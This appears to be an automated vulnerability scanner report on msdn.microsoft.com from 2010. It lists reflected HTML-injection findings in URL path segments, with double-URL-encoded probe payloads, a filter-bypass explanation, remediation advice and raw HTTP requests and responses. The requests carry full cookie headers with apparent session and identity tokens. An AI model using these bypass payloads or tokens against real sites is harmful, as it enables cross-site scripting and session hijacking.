HTTP/1.1 200 OK Cache-Control: private Content-Length: 9210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:01 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee721044.aspxa0813"><a>5bed963aadc" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36289%2522%253e%253ca%253eae7249556c5 was submitted in the REST URL parameter 1. This input was echoed as 36289"><a>ae7249556c5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us36289%2522%253e%253ca%253eae7249556c5/library/ee725279.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:12:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us36289"><a>ae7249556c5/library/ee725279" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e35f%2522%253e%253ca%253e9fb18031369 was submitted in the REST URL parameter 2. This input was echoed as 9e35f"><a>9fb18031369 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9e35f%2522%253e%253ca%253e9fb18031369/ee725279.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:12:56 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9e35f"><a>9fb18031369/ee725279" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 919d4%2522%253e%253ca%253e262395ba879 was submitted in the REST URL parameter 3. This input was echoed as 919d4"><a>262395ba879 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ee725279.aspx919d4%2522%253e%253ca%253e262395ba879 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:07 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee725279.aspx919d4"><a>262395ba879" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d5fa%2522%253e%253ca%253ee12a11fc95d was submitted in the REST URL parameter 1. This input was echoed as 2d5fa"><a>e12a11fc95d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us2d5fa%2522%253e%253ca%253ee12a11fc95d/library/ff361664.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:15 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us2d5fa"><a>e12a11fc95d/library/ff361664" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de6e%2522%253e%253ca%253ee545caa6f17 was submitted in the REST URL parameter 2. This input was echoed as 5de6e"><a>e545caa6f17 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library5de6e%2522%253e%253ca%253ee545caa6f17/ff361664.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:32 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5de6e"><a>e545caa6f17/ff361664" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18998%2522%253e%253ca%253e4dd5a078452 was submitted in the REST URL parameter 3. This input was echoed as 18998"><a>4dd5a078452 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ff361664.aspx18998%2522%253e%253ca%253e4dd5a078452 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 